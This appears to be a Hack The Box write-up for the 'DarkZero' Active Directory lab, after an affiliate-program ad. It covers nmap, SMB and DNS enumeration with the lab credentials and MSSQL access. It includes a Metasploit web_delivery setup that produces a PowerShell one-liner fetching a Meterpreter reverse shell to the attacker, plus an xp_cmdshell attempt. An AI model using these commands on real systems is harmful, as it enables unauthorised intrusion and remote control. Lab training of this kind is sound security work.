DarkZero - HTB Write-up

Difficulty: Hard

🎯 Affiliate Program

Interested in earning rewards while sharing awesome content? Join the 1337sheets Affiliate Program!

Here's how it works:

• Refer subscribers who become premium members
• Earn a 50% discount on select products OR a $20 account credit at kaizentechlabs.us
• Get access to electronic hacking gear, Pwnagotchis, Bjorn the Network Raiders, and more!

Ready to join?
Contact: contact@1337sheets.com
Subject line: 1337sheets affiliate program

📋 Box Overview

DarkZero is a layered Active Directory challenge that simulates a realistic enterprise environment. This box requires chaining multiple advanced techniques including SQL linked servers, Kerberos delegation, ticket manipulation, and cross-subnet pivoting. You'll encounter multihomed hosts, split-horizon DNS, and various privilege escalation paths that demand both technical skill and persistence.

Key Learning Areas:

• Active Directory enumeration and exploitation
• SQL Server linked server abuse
• Kerberos ticket collection and Pass-the-Ticket attacks
• Network pivoting with Ligolo
• CVE exploitation for privilege escalation

Initial Credentials:
john.w / RFulUtONCOL!

🔍 Enumeration

Port Scanning

Starting with a comprehensive nmap scan to identify open services:

nmap -p 1-65535 -T4 -A -v <target_ip>

Key Services Identified:

• DNS (53) - Simple DNS Plus
• Kerberos (88) - Windows Kerberos authentication
• LDAP (389/636/3268/3269) - Active Directory services
• SMB (139/445) - File sharing
• MSSQL (1433) - Microsoft SQL Server 16.00.1000.00
• WinRM (5985) - Remote management
• RPC (135, various high ports) - Remote procedure calls

Domain Information

Domain: darkzero.htb
Primary DC: DC01.darkzero.htb
Secondary DC: dc02.darkzero.ext

Hosts File Generation

Using NetExec to automatically populate the hosts file:

nxc smb <target_ip> -u 'john.w' -p 'RFulUtONCOL!' --generate-hosts-file /etc/hosts

SMB Enumeration

smbmap -H <target_ip> -d 'darkzero.htb' -u 'john.w' -p 'RFulUtONCOL!'

Only default shares were present - no immediate vectors here. BloodHound enumeration also yielded minimal useful results.

DNS Enumeration - Critical Discovery

Querying for DNS records reveals something interesting:

dig @DC01.darkzero.htb ANY darkzero.htb

Important Finding:
The domain resolves to two different IP addresses:

• Public-facing network (10.x.x.x/8)
• Internal network (172.16.20.1/16)

This indicates a multihomed host with split-horizon DNS configuration. The 172.16.20.x subnet is likely only accessible from within the internal network - we'll need to pivot to reach it.

💉 Initial Access via MSSQL

Setting Up Web Delivery

First, prepare a Meterpreter payload delivery mechanism:

msfconsole -q -x "use exploit/multi/script/web_delivery; \
  set payload windows/x64/meterpreter/reverse_tcp; \
  set LHOST tun0; \
  set LPORT 443; \
  set target 2; \
  exploit -j"

This creates a PowerShell one-liner that downloads and executes our payload.

MSSQL Connection

Connect to the SQL server using our credentials:

mssqlclient.py 'darkzero.htb/john.w:RFulUtONCOL!@<target_ip>' -windows-auth

Attempting Command Execution

Try enabling xp_cmdshell on DC01:

enable_xp_cmdshell

Result: ❌ Failed - insufficient privileges